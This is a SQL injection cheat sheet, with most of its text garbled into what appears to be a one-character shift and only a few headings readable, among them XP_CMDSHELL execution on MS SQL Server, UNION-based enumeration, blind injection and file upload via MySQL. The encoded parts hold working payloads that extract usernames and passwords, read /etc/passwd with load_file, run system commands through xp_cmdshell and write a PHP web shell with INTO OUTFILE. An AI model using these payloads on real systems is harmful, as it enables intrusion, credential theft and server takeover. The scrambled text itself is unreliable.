6/*0/42-*/+&$5*0/&953"$5%"5"#"4&5"#-&4
GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- M@LD EQNLRXRNAIDBSRVGDQD
WSXODBG@Q

<5"#-&/".&>
6/*0/42-*/+&$5*0/&953"$55"#-&$0-6.//".&4
GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- BNKTLM?M@LD EQNL

%#/".&HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD5"#-&/".&
<$0-6.//".& >
6/*0/42-*/+&$5*0/&953"$5RS'*&-%
GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- $0-6.//".& EQNL5"#-&
/".&
<'*&-%7"-6&>
6/*0/42-*/+&$5*0/&953"$5MC'*&-%
/".&
<'*&-%7"-6&>
6/*0/42-*/+&$5*0/&953"$5MC'*&-%
/".&
<'*&-%7"-6&>
.442-#KHMC*MIDBSHNM
#-*/%42-*/+&$5*0/%&5&$5*0/
*MSDFDQ*MIDBSHNM
GSSO<RHSD>O@FD@RO HC8"*5'03%&-": RDBNMCR
4SQHMF*MIDBSHNM
GSSO<RHSD>O@FD@RO HCW8"*5'03%&-": RDBNMCR
#@RHB6R@FD
GSSO<RHSD>O@FD@RO HCV@HSENQCDK@X
4DDHEHSS@JDRRDBNMCRSNQDSTQMSGDO@FD*EHSCNDR SGDMXNTB@M@RJHSPTDRSHNMR
GSSO<RHSD>
O@FD@RO HCHEMNS RTARSQHMF RDKDBS!!UDQRHNM

V@HSENQCDK@X

"RJHSHEGDHRQTMMHMF42-4DQUDQ
GSSO<RHSD>
O@FD@RO HCHEMNS RDKDBSRXRSDL?TRDQ
R@V@HSENQCDK@X
"RJHSHEHSRQTMMHMF@RR@
GSSO<RHSD>
O@FD@RO HCHEHR?RQUQNKDLDLADQ RXR@CLHM
V@HSENQCDK@X
"RJHSHESGDBTQQDMSTRDQ@LDLADQNESGDRXR@CLHMFQNTO
#-*/%42-*/+&$5*0/&953"$5%"5"#"4&64&3
5NS@K$G@Q@BSDQR
GSSO<RHSD>O@FD@RO HC*' -&/ 64&3

8"*5'03%&-":

8"*5'03%&-":

8"*5'03%&-":
RDBNMCR
% RS$G@Q@BSDQ
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

8"*5'03
%&-": RDBNMCR

8"*5'03
%&-":

8"*5'03
%&-":

8"*5'03
%&-": RDBNMCR
#MC$G@Q@BSDQ

8"*5'03
%&-": RDBNMCR

8"*5'03
%&-": RDBNMCR
0QC$G@Q@BSDQ

8"*5'03
%&-": RDBNMCR

8"*5'03
%&-":

8"*5'03
%&-": RDBNMCR

8"*5'03
%&-": RDBNMCR

8"*5'03
%&-":

8"*5'03
%&-": RDBNMCR
%@S@A@RD6RDQ%#0
#-*/%42-*/+&$5*0/&953"$5%"5"#"4&/".&
GSSO<RHSD>O@FD@RO HC*' -&/ %#?/".&

8"*5'03%&-":
RDBNMCR
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

8"*5'03%&-": RDBNMCR

8"*5'03%&-": RDBNMCR

8"*5'03%&-": RDBNMCR

8"*5'03%&-": RDBNMCR

8"*5'03%&-": RDBNMCR

8"*5'03%&-": RDBNMCR

8"*5'03%&-": RDBNMCR

8"*5'03%&-": RDBNMCR
%@S@A@RD/@LD130%#
#-*/%42-*/+&$5*0/&953"$5RS %"5"#"4&5"#-&
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501/".&EQNLRXRNAIDBSRVGDQD

WSXOD6

8"*5'03%&-": RDBNMCR
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

RXRNAIDBSRVGDQDWSXODBG@Q

8"*5'03%&-":
RDBNMCR


8"*5'03%&-":
RDBNMCR


8"*5'03%&-":
RDBNMCR


8"*5'03%&-":
RDBNMCR


8"*5'03%&-":
RDBNMCR
5@AKD/@LD64&34
#-*/%42-*/+&$5*0/&953"$5MC%"5"#"4&5"#-&
WSXODBG@Q
@MCM@LD64&34

8"*5'03%&-": RDBNMCR

@MCM@LD64&34

8"*5'03%&-":
RDBNMCR

@MCM@LD64&34

8"*5'03%&-":
RDBNMCR

@MCM@LD64&34

8"*5'03%&-":
RDBNMCR

@MCM@LD64&34

8"*5'03%&-":
RDBNMCR

@MCM@LD64&34

8"*5'03%&-":
RDBNMCR

@MCM@LD64&34

8"*5'03%&-":
RDBNMCR
5@AKD/@LD03%&34
#-*/%42-*/+&$5*0/&953"$5QC%"5"#"4&5"#-&
WSXODBG@Q
@MCM@LD03%&34

8"*5'03%&-": RDBNMCR

@MCM@LD03%&34

8"*5'03%&-":
RDBNMCR

@MCM@LD03%&34

8"*5'03%&-":
RDBNMCR
@MCM@LD03%&34

8"*5'03%&-":
RDBNMCR

@MCM@LD03%&34

8"*5'03%&-":
RDBNMCR

@MCM@LD03%&34

8"*5'03%&-":
RDBNMCR

@MCM@LD03%&34

8"*5'03%&-":
RDBNMCR

@MCM@LD03%&34

8"*5'03%&-":
RDBNMCR

@MCM@LD03%&34

8"*5'03%&-":
RDBNMCR

@MCM@LD03%&34

8"*5'03%&-":
RDBNMCR
5@AKD/@LD$6450.&34
#-*/%42-*/+&$5*0/&953"$5RS5"#-&$0-6.//".&
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501BNKTLM?M@LDEQNL130
%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34

8"*5'03%&-":
RDBNMCR
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34

8"*5'03%&-": RDBNMCR


8"*5'03%&-": RDBNMCR


8"*5'03%&-": RDBNMCR


8"*5'03%&-": RDBNMCR
$NKTLM/@LD64&3
#-*/%42-*/+&$5*0/&953"$5MC5"#-&$0-6.//".&
%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD64&3

8"*5'03%&-": RDBNMCR

EQNL130%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD64&3

8"*5'03%&-": RDBNMCR

BNKTLM?M@LD64&3

8"*5'03%&-": RDBNMCR

BNKTLM?M@LD64&3

8"*5'03%&-": RDBNMCR

BNKTLM?M@LD64&3

8"*5'03%&-": RDBNMCR
$NKTLM/@LD1"44
#-*/%42-*/+&$5*0/&953"$5QC5"#-&$0-6.//".&
%#HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD64&34@MC
BNKTLM?M@LD 1"44

8"*5'03%&-": RDBNMCR

BNKTLM?M@LD1"44

8"*5'03%&-": RDBNMCR

BNKTLM?M@LD1"44

8"*5'03%&-": RDBNMCR
$NKTLM/@LD*%
#-*/%42-*/+&$5*0/&953"$5RS'*&-%0'RS308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$550164&3EQNL64&34

8"*5'03
%&-": RDBNMCR
GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL

64&34

8"*5'03%&-": RDBNMCR

64&34

8"*5'03%&-": RDBNMCR

64&34

8"*5'03%&-": RDBNMCR

64&34

8"*5'03%&-": RDBNMCR

64&34

8"*5'03%&-": RDBNMCR
'HDKC%@S@"%.*/
#-*/%42-*/+&$5*0/&953"$5MC'*&-%0'RS308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$55011"44EQNL64&34

8"*5'03
%&-": RDBNMCR
GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$55011"44EQNL

64&34

8"*5'03%&-": RDBNMCR

64&34

8"*5'03%&-": RDBNMCR

64&34

8"*5'03%&-": RDBNMCR
'HDKC%@S@
#-*/%42-*/+&$5*0/&953"$5MC'*&-%0'RS308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501*% EQNL64&34

8"*5'03
%&-": RDBNMCR
GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$5501*% EQNL

64&34

8"*5'03%&-": RDBNMCR

64&34

8"*5'03%&-": RDBNMCR

64&34

8"*5'03%&-": RDBNMCR
'HDKC%@S@
#-*/%42-*/+&$5*0/&953"$5RS'*&-%0'MC308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$550164&3EQNL64&34VGDQD64&3/05
HM "%.*/
NQCDQAX64&34CDRB

8"*5'03%&-": RDBNMCR
GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL

64&34VGDQD64&3/05HM "%.*/
NQCDQAX64&3CDRB

8"*5'03%&-":
RDBNMCR

64&34VGDQD64&3/05HM "%.*/
NQCDQAX64&3CDRB

8"*5'03%&-":
RDBNMCR

64&34VGDQD64&3/05HM "%.*/
NQCDQAX64&3CDRB

8"*5'03%&-":
RDBNMCR
'HDKC%@S@+0&
#-*/%42-*/+&$5*0/&953"$5RS'*&-%0'MC308
GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$550164&3EQNL64&34VGDQD64&3/05
HM +0&
NQCDQAX64&34CDRB

8"*5'03%&-": RDBNMCR

64&34VGDQD64&3/05HM +0&
NQCDQAX64&3CDRB

8"*5'03%&-":
RDBNMCR

64&34VGDQD64&3/05HM +0&
NQCDQAX64&3CDRB

8"*5'03%&-":
RDBNMCR

64&34VGDQD64&3/05HM +0&
NQCDQAX64&3CDRB

8"*5'03%&-":
RDBNMCR
'HDKC%@S@+*.
Calling the XP_CMDSHELL Stored Procedure in MS SQL Server
(Privileged Database User Account Required)
*MRNLDB@RDRHSHRONRRHAKDSNQTM@QAHSQ@QXBNLL@MCRNM@RXRSDLUH@42-HMIDBSHNM
SGQNTFGSGD91?$.%4)&--RSNQDCOQNBDCTQD )DQD@QDRNLDRSDORSNFDSSGHRVNQJHMF
5DBGMHPTDENQ91?$.%4)&--42-*MIDBSHNMNM8HMCNVR
$GDBJSGDBTQQDMSC@S@A@RDUDQRHNM 8HSG@MHMA@MC@OOQN@BG DQQNQA@RDC
SGD
RXMS@WENQCNHMFSGHRHM@TRDQM@LDEHDKCNE@KNFHMO@FDVNTKCAD
6RDQM@LD"/%!!7&34*0/
1@RRVNQC@MXSGHMF
0MSGDC@S@A@RDRDQUDQ SGDPTDQXRSQHMFVNTKCKNNJRNLDSGHMFKHJD
4&-&$56RDQRTRDQ 6RDQRO@RRVNQC'30.6RDQR8)&3&6RDQRTRDQab"/%
!!7&34*0/b"/%6RDQRO@RRVNQCa@MXSGHMFb
NTSOTS4XMS@WDQQNQBNMUDQSHMFMU@QBG@QU@KTD.HBQNRNES42-4DQUDQ
*MSDK9

'QNLSGHRNTSOTS VDJMNVSG@SSGD91?$.%4)&--RSNQDCOQNBDCTQDHRKHJDKX@U@HK@AKD
ATSVNTKCQDPTHQDSG@SSGDVDA@OOKHB@SHNMHRTRHMF@OQHUHKDFDC@BBNTMS
$GDBJVG@STRDQSGDVDA@OOKHB@SHNMHRKNFFDCHMSNSGDC@S@A@RD@R
6RDQM@LD"/%4:45&.?64&3
1@RRVNQC@MXSGHMF
0MSGDC@S@A@RDRDQUDQ SGDPTDQXRSQHMFVNTKCKNNJRNLDSGHMFKHJD
4&-&$56RDQRTRDQ 6RDQRO@RRVNQC'30.6RDQR8)&3&6RDQRTRDQa"/%
4:45&.?64&3b"/%6RDQRO@RRVNQCa@MXSGHMFb
NTSOTS4XMS@WDQQNQBNMUDQSHMFMU@QBG@QU@KTDR@SN@BNKTLMC@S@SXODHMS
'QNLRSDOR@MC VDJMNVENQBDQS@HMSG@SSGDC@S@A@RDHRQTMMHMF.442-4DQUDQ
@RSGDLNRSOQHUHKDFDCTRDQ 5GDQDENQD HSHRKHJDKXSG@SSGD91?$.%4)&--RSNQDC
OQNBDCTQDVHKKADDM@AKDC@MC@U@HK@AKDSNSGDBTQQDMSC@S@A@RDTRDQ
#DENQD@SSDLOSHMFSNDWDBTSDSGDOQNBDCTQD NMDEHM@KRSDOHRCTDSNRODBHEHB@KKXGNV
VDB@KKDWDB *MSGHRDW@LOKD VD@QDB@KKHMFDWDB@R@MDVPTDQX VGHBGLD@MRSG@SVD
VHKKG@UDSNSDQLHM@SDSGDOQDUHNTRPTDQX 4HMBDVDB@MMNSRDDSGDDW@BSPTDQXRSQHMF@R
@VDATRDQ VDVHKKODQENQL@RHLOKDSDRSSNUDQHEXSG@SSGDC@S@A@RDVHKK@KKNVTRSN
BKNRDNEESGDOQDUHNTRPTDQX@MCQTMSGDMDVNMDVHSGNTS@MXDQQNQ
6RDQM@LD V@HSENQCDK@X
1@RRVNQC@MXSGHMF
&WDBTSDSGD91?$.%4)&--RSNQDCOQNBDCTQD 4MHEE*$.1SQ@EEHBNMXNTQ@RRDRRLDMS
GNRS 5BOCTLO 8HQDRG@QJ DSB

6RDQM@LDDWDBL@RSDQWO?BLCRGDKKOHMF
1@RRVNQC@MXSGHMF
4&-&$56RDQRTRDQ 6RDQRO@RRVNQC'30.6RDQR8)&3&6RDQRTRDQaDWDB
L@RSDQWO?BLCRGDKKOHMFb"/%6RDQRO@RRVNQCa@MXSGHMFb
*EXNTQDBDHUD*$.1DBGNQDPTDRSSQ@EEHBNQHFHM@SHMFEQNLSGDS@QFDS XNTJMNVSG@SXNT
@QDQTMMHMF@QAHSQ@QXBNLL@MCR@R@M@CLHMHRSQ@SHUDTRDQ 4"
6MENQSTM@SDKXHMSGD
B@RDR*G@UDENTMCSGHRUTKMDQ@AHKHSXNM NTSOTSV@RMNSRDMSCHQDBSKXSNSGDAQNVRDQ
5G@SHRVGXSGD*$.1SDRSHRCNMD #TSHSHR@KRNONRRHAKDSN@CC@TRDQ DSB
Manual SQL Injection (PHP/MYSQL Server)

/TLADQNEBNKTLMRDMTLDQ@SHNM
6RHMF0QCDQAXSNCDSDQLHMDSGDMTLADQNEBNKTLMRHM@FHUDMPTDQXRSQHMFENQTRDVHSG
AKHMCRPKHMIDBSHNM
GSSO<RHSDBNL>O@FDOGO HCNQCDQAX
8GDMVDO@RR HSRGNTKCR@XTMJMNVMBNKTLMHMNQCDQAXBK@TRD8DTRDSGD
OQNBDRRNEDKHLHM@SHNMSNCDSDQLHMDSGDMTLADQNEBNKTLMR/DWSVDVNTKCG@KUDSGD
MTLADQ
"F@HMVDVNTKCFDS@MDQQNQ-DSRSQXRNLDSGHMFKHJD
8GDMVDCNSGDMTLADQ SGDPTDQXBNLOKDSDRITRSEHMD8D@QDBKNRD ATSSGDQD
LHFGSADLNQD
"MNSGDQDQQNQHMSGDNQCDQAXBK@TRD8DJMNVSGDQDHRLNQDSG@M ATSKDRRSG@M
5GHRO@RRDCITRSEHMD.HFGSADLNQD KDSRSDRS
&QQNQ5GHRLD@MRVDG@UDBNKTLMR/NVVD@QDQD@CXENQRNLDAKHMC42-HMIDBSHNM
5GDQD@RNMENQCNHMFSGHRHRADB@TRDSGDTMHNMRDKDBSPTDQXLTRSG@UDSGDR@LDMTLADQ
NEBNKTLMRVGDMRDKDBSHMFEQNL@PTDQX
/NVVDQTMSGDENKKNVHMFNMSGDRHSD@MCRS@QSSDRSHMFENQRNLDS@AKDM@LDR
UNION ALL SELECT to enum db info

GSSO<RHSDBNL>O@FDOGO HCTMHNM@KKRDKDBS
GSSO<RHSDBNL>O@FDOGO TMHNM@KKRDKDBS
NQ
GSSO<RHSDBNL>O@FDOGO MTKK TMHNM@KKRDKDBS
5GDMTLADQR @MCCHROK@XNMSGDRBQDDMRNVDJMNVSG@SSGNRD@QDSGDBNKTLMR
SG@SVHKKDBGNA@BJC@S@ENQTR
TRDQ
!!UDQRHNM !!C@S@CHQ
GSSO<RHSDBNL>O@FDOGO MTKK TMHNM@KKRDKDBS KN@C?EHKD DSB

O@RRVC

@MC
KN@C?EHKD 0x2f6574632f706173737764

:NTB@MTRDSGHRHEXNTQTMHMSN@RDQUDQSG@SG@RL@FHBPTNSDRSTQMDCNM
4SQHMF&MBNCDQ
VFDSGSSOVVVFQ@XRB@KDQDRD@QBGNQFMDVBNCD4SQHMF&MBNCDQS@Q
S@QWUE4SQHMF&MBNCDQS@Q
BC4SQHMF&MBNCDQ
L@JD
BNMUDQSLWDSBO@RRVC
&MBNCDCENQ.:42-*MIDBSHNMR
0QHFHM@KDSBO@RRVC
&MBNCDCWEE
Blind SQL Injection

GSSO<RHSDBNL>O@FDOGO HC@MC
GSSO<RHSDBNL>O@FDOGO HC@MC
5DRSHERTARDKDBSVNQJR
VGDMRDKDBSRCNMSVNQJSGDMVDTRDRTARDKDBS
HD
GSSO<RHSDBNL>O@FDOGO HC@MC RDKDBS

HEO@FDKN@CRMNQL@KKXSGDMRTARDKDBSRVNQJ
SGDMVDFNMM@RDDHEVDG@UD@BBDRRSNLXRPKTRDQ
HD
GSSO<RHSDBNL>O@FDOGO HC@MC RDKDBSEQNLLXRPKTRDQKHLHS

HEO@FDKN@CRMNQL@KKXVDG@UD@BBDRRSNLXRPKTRDQ@MCSGDMK@SDQVDB@MOTKKRNLD
O@RRVNQCTRHFMKN@C?EHKD
ETMBSHNM@MC065'*-&

$GDBJS@AKD@MCBNKTLMM@LDR
5GHRHRO@QSVGDMFTDRRHMFHRSGDADRSEQHDMC
HD
GSSO<RHSDBNL>O@FDOGO HC@MC RDKDBSEQNLTRDQRKHLHS
VHSGKHLHS
NTQPTDQXGDQDQDSTQMRQNVNEC@S@ B@TRDRTARDKDBSQDSTQMRNMKXQNV SGHRHRUDQX
HLONQS@MS
SGDMHESGDO@FDKN@CRMNQL@KKXVHSGNTSBNMSDMSLHRRHMF SGDS@AKDTRDQRDWHSR
HEXNTFDS'"-4& RNLD@QSHBKDLHRRHMF
ITRSBG@MFDS@AKDM@LDTMSHKXNTFTDRRSGDQHFGS
NMD
KDSRR@XSG@SVDG@UDENTMCSG@SS@AKDM@LDHRTRDQR MNVVG@SVDMDDCHRBNKTLM
M@LD
SGDR@LD@RS@AKDM@LD VDRS@QSFTDRRHMF-HJDHR@HCADENQDSQXSGDBNLLNMM@LDRENQ
BNKTLMR
HD
GSSO<RHSDBNL>O@FDOGO HC@MC RDKDBSRTARSQHMF BNMB@S O@RRVNQC

EQNL
TRDQRKHLHS

HESGDO@FDKN@CRMNQL@KKXVDJMNVSG@SBNKTLMM@LDHRO@RRVNQC HEVDFDSE@KRDSGDM
SQXBNLLNMM@LDRNQITRSFTDRR
GDQDVDLDQFDVHSGSGDBNKTLMO@RRVNQC SGDMRTARSQHMFQDSTQMRSGDEHQRSBG@Q@BSDQ

1TKKC@S@EQNLC@S@A@RD
VDENTMCS@AKDTRDQRHBNKTLMRTRDQM@LDO@RRVNQCRNVDFNMM@OTKKBG@Q@BSDQREQNL
SG@S
GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5
BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS

NJSGHRGDQDOTKKRSGDEHQRSBG@Q@BSDQEQNLEHQRSTRDQHMS@AKDTRDQR
RTARSQHMFGDQDQDSTQMREHQRSBG@Q@BSDQ@MCBG@Q@BSDQHMKDMFSG@RBHH
BNMUDQSRSG@S
BG@Q@BSDQHMSN@RBHHU@KTD
@MCSGDMBNLO@QDHSVHSGRHLANKFQD@SDQSGDM
RNHESGD@RBHHBG@QFQD@SDQSGDM SGDO@FDKN@CRMNQL@KKX 536&
VDJDDOSQXHMFTMSHKVDFDSE@KRD

EQNLTRDQRKHLHS

VDFDS536& JDDOHMBQDLDMSHMF

EQNLTRDQRKHLHS

536&@F@HM GHFGDQ
EQNLTRDQRKHLHS

'"-4&
RNSGDEHQRSBG@Q@BSDQHMTRDQM@LDHRBG@Q
6RHMFSGD@RBHHBNMUDQSDQVDJMNVSG@S
BG@Q
HRKDSSDQB
SGDMKDSRBGDBJSGDRDBNMCBG@Q@BSDQ
EQNLTRDQRKHLHS

/NSDSG@SHLBG@MFDC SN SNFDSSGDRDBNMCBG@Q@BSDQ MNVHSQDSTQMRSGD
RDBNMCBG@Q@BSDQ BG@Q@BSDQHMKDMFGS

EQNLTRDQRKHLHS

536& SGDO@FDKN@CRMNQL@KKX GHFGDQ

EQNLTRDQRKHLHS

'"-4& KNVDQMTLADQ
EQNLTRDQRKHLHS

536& GHFGDQ
EQNLTRDQRKHLHS

'"-4&
VDJMNVSG@SSGDRDBNMCBG@Q@BSDQHRBG@Q
@MCSG@SHRH8DG@UDBHRNE@Q
RNJDDOHMBQDLDMSHMFTMSHKXNTFDSSGDDMC VGDMQDSTQMRE@KRDVDJMNVSG@SVD
G@UDQD@BGSGDDMC

File Upload Via SQL Injection .X42-
5GD'*-&OQHUHKDFD
*EVDV@MSSNQD@CNQVQHSDSNEHKDRVDG@UDSNG@UDSGD'*-&OQHUHKDFD
'HQRSRDDVHBGTRDQVD@QDHMCAVHSGBNCD
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5BTQQDMS?TRDQ MTKK
XNTB@MOTSBTQQDMS?TRDQNQTRDQ
NQRXRSDL?TRDQ
5GHRVHKKFHUDTRSGDTRDQM@LD!RDQUDQ MNQL@KKX!KNB@KGNRS

:NTB@M@KRNTRDSGDENKKNVHMFAKHMC42-HMIDBSHNMRPTDQX
ATSHSRUDQXANNQHMF
(TDRR@M@LD
GSSO<RHSDBNL>O@FDOGO HCc"/%TRDQ
-*,&aQNNS
#QTSDSGDM@LDKDSSDQAXKDSSDQ
GSSO<RHSDBNL>O@FDOGO HCc"/%.*% TRDQ

bL

bL

bLDBB
/NVVDLTRS@BBDRSNLXRPKTRDQRN
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5 EHKD?OQHU '30.LXRPKTRDQ
8)&3&TRDQaTRDQM@LD
ENQTRDQM@LDVDOTSSGDM@LDNEBTQQDMS?TRDQ
:NTB@M@KRNG@UD@KNNJ@SSGDVGNKDLXRPKTRDQS@AKDVHSGNTSSGD8)&3&BK@TRD ATS*
BGNRDSGHRV@XADB@TRDXNTB@MD@RHKX@C@OSSGDHMIDBSHNMENQAKHMC42-HMIDBSHNM
GSSO<RHSDBNL>O@FDOGO HCc"/%.*% 4&-&$5EHKD?OQHU'30.LXRPKTRDQ8)&3&
TRDQaTRDQM@LDb

a:
/@STQ@KKX SGHRHSR@AKHMCRNXTNB@MSVQHSD ADBNTRDHSRMNS@TMHNMRDKDBS ATS

HSRRTARDKDBSR
:NTB@M@KRNQDBHDUDSGD'*-&OQHUHKDFDHMENEQNLSGDHMENQL@SHNMRBGDL@S@AKDNM.X42
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5FQ@MSDD HR?FQ@MS@AKD'30.
HMENQL@SHNM?RBGDL@TRDQ?OQHUHKDFDR8)&3&OQHUHKDFD?SXODaEHKDb"/%FQ@MSDDKHJD
aTRDQM@LD
-HJD*/AKHMCRPKH
c"/%.*% 4&-&$5HR?FQ@MS@AKD'30.HMENQL@SHNM?RBGDL@TRDQ?OQHUHKDFDR8)&3&
OQHUHKDFD?SXODaEHKDb"/%FQ@MSDDKHJDaTRDQM@LDb

b:
The web directory problem

0MBDVDJMNVHEVDB@MQD@CVQHSDEHKDRVDG@UDSNBGDBJNTSSGDQHFGSO@SG*MSGDLNRS
B@RDRSGD.X42-RDQUDQHRQTMMHMFNMSGDR@LDL@BGHMD@RSGDVDARDQUDQCNDR@MCSN
@BBDRRNTQEHKDRK@SDQVDV@MSSNVQHSDSGDLNMSNSGDVDACHQDBSNQX*EXNTCDEHMDMN
O@SG */50065'*-&VHKKVQHSDHMSNSGDC@S@A@RDCHQDBSNQX
0M.X42-VDB@MFDS@MDQQNQLDRR@FDCHROK@XHMFSGDC@S@CHQ
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5KN@C?EHKD b@
MTKK
0M.X42-VDTRD
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5!!C@S@CHQ MTKK
5GDCDE@TKSO@SGENQEHKDVQHSHMFSGDMHRC@S@CHQ=C@S@A@RDM@LD
:NTB@MEHFTQDNTSSGDC@S@A@RDM@LDVHSG
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5C@S@A@RD
MTKK
/NVSGDRDHMENQL@SHNM@QDG@QCSNFDSVHSGAKHMC42-HMIDBSHNM#TSXNTCNMbSMDDCSGDL
MDBDRR@QHKX+TRSL@JDRTQDXNTEHMCNTSSGDVDACHQDBSNQX@MCTRDRNLDSNITLO
A@BJEQNLSGDC@S@CHQ
*EXNT@QDKTBJXSGDRBQHOSTRDRLXRPK?QDRTKS
LXRPK?EQDD?QDRTKS
LXRPK?EDSBG?QNV
NQRHLHK@QETMBSHNMR@MCCHROK@XRV@QMHMFLDRR@FDR5GDMXNTB@MD@RHKXEHMCNTSSGD
VDARDQUDQCHQDBSNQXAXKD@UHMFSGNRDETMBSHNMRVHSGMNHMOTSSG@SSGDXVHKKSGQNV@
V@QMHMFLDRR@FDKHJD
8@QMHMFLXRPK?EDSBG?QNV
RTOOKHDC@QFTLDMSHRMNS@U@KHC.X42-QDRTKSQDRNTQBDHM
VDARDQUDQO@SGEHKDOGONMKHMDWWW
5NOQNUNJD@MDQQNQKHJDSGHRSQXRNLDSGHMFKHJD
GSSO<RHSDBNL>O@FDOGO HCc"/%bNQ@CCRNLDKHJDO@Q@L<>
5GHRVNQJR@SSGDLNRSVDARHSDR*EXNTbQDMNSKTBJXXNTG@UDSNFTDRRSGDVDACHQDBSNQX
NQSQXSNTRDKN@C?EHKD
SNEDSBGEHKDRNMSGDRDQUDQVGHBGLHFGSGDKOXNT)DQDHR@MDV
KHRSNEONRRHAKDKNB@SHNMRENQSGD"O@BGDBNMEHFTQ@SHNMEHKD VGHBGL@XRONHKSGD
VDACHQDBSNQXO@SG
DSBHMHSC@O@BGD
DSBHMHSC@O@BGD
DSBGSSOCGSSOCBNME
DSB@O@BGD@O@BGDBNME
DSB@O@BGDGSSOCBNME
DSB@O@BGD@O@BGDBNME
DSB@O@BGDGSSOCBNME
TRQKNB@K@O@BGDBNMEGSSOCBNME
TRQKNB@K@O@BGDBNMEGSSOCBNME
NOS@O@BGDBNMEGSSOCBNME
GNLD@O@BGDGSSOCBNME
GNLD@O@BGDBNMEGSSOCBNME
DSB@O@BGDRHSDR@U@HK@AKDCDE@TKS
DSB@O@BGDUGNRSRCCDE@TKS?UGNRSHMBKTCD
$GDBJNTSSGDVDARDQUDQRM@LDEHQRSAXQD@CHMFSGDGD@CDQHMEN@MCSGDMEHFTQDNTS
VGDQDHSTRT@KKXRSNQDRHSRBNMEHFTQ@SHNMEHKDR5GHR@KRNCDODMCRNMSGD04SXOD MHW
VHM
RNXNTL@XV@MSSNBGDBJSG@SNTSSNN6RD!!UDQRHNMNQUDQRHNM
SNEHMCSG@S
NTS
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5!!UDQRHNM MTKK
MSKNF@SSGDDMCLD@MRHSbR@VHMCNVRANW KNFNMKXLD@MRHSbRMHWANW
0QS@JD@KNNJ@SSGDO@SGRHMDQQNQLDRR@FDRNQ@SSGDGD@CDQ
5XOHB@KVDACHQDBSNQHDRSNFTDRRBNTKCAD
U@QVVVQNNS
U@QVVVCAM@LDO@SG
U@QVVVRHSDM@LDGSCNBR
U@QVVVKNB@KGNRSGSCNBR

#@RHB@KKXXNTRGNTKCAD@KKNVDCSNVQHSDHMSN@MXCHQDBSNQXVGDQDSGD.X42-RDQUDQG@R
VQHSD@BBDRRSN @RKNMF@RXNTG@UDSGD'*-&OQHUHKDFD)NVDUDQ @M"CLHMHRSQ@SNQB@M
KHLHSSGDO@SGENQOTAKHBVQHSD@BBDRR
Create useful files
0MBDXNTEHFTQDCNTSSGDQHFGSCHQDBSNQXXNTB@MRDKDBSC@S@@MCVQHSDHSHMSN@EHKDVHSG
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5BNKTLMM@LD MTKK'30.S@AKDM@LD
*/50065'*-&aVDAO@SGEHKDSWS
RNLDSHLDREQNLLXRPKTRDQ
0QSGDVGNKDC@S@VHSGNTSJMNVHMFSGDS@AKDBNKTLMM@LDR
GSSO<RHSDBNL>O@FDOGO HCc03*/50065'*-&aVDAO@SGEHKDSWS
*EXNTV@MSSN@UNHCROKHSSHMFBG@QRADSVDDMSGDC@S@ TRD*/50%6.1'*-&HMRSD@CNE
*/50065'*-&
:NTB@M@KRNBNLAHMDKN@C?EHKD
VHSGHMSNNTSEHKD KHJDOTSSHMF@BNOXNE@EHKDSNSGD
@BBDRR@AKDVDARO@BD
GSSO<RHSDBNL>O@FDOGO HCc"/%6/*0/4&-&$5KN@C?EHKD b_b
*/50065'*-&
a_
*MRNLDB@RDR*bCQDBNLLDMCSNTRD
GSSO<RHSDBNL>O@FDOGO HCc"/%6/*0/4&-&$5GDW KN@C?EHKD b_b
*/50
065'*-&a_
@MCCDBQXOSHSK@SDQVHSGSGD1)1$G@QRDS&MBNCDQ DRODBH@KKXVGDMQD@CHMFSGD.X42C@S@EHKDR
0QXNTB@MVQHSDVG@SDUDQXNTV@MSHMSN@EHKD
GSSO<RHSDBNL>O@FDOGO HCc"/%6/*0/4&-&$5aBNCDb MTKK*/50065'*-&a
VDARDQUDQCHQEHKDOGO
)DQD@QDRNLDTRDETKBNCDDW@LOKDR
"/NQL@KBNCDENQ@RGDKK 1)1

RXRSDL ?(&5<KNK>

HSRUDQXHLONQS@MSSG@SSGD1)1R@ED?LNCDLTRSADSTQMDCNEE
*EHRSTQMDCNML@XADVDB@MAXO@RRRXLOKDVHSG@GDWBNMUDQSDQ
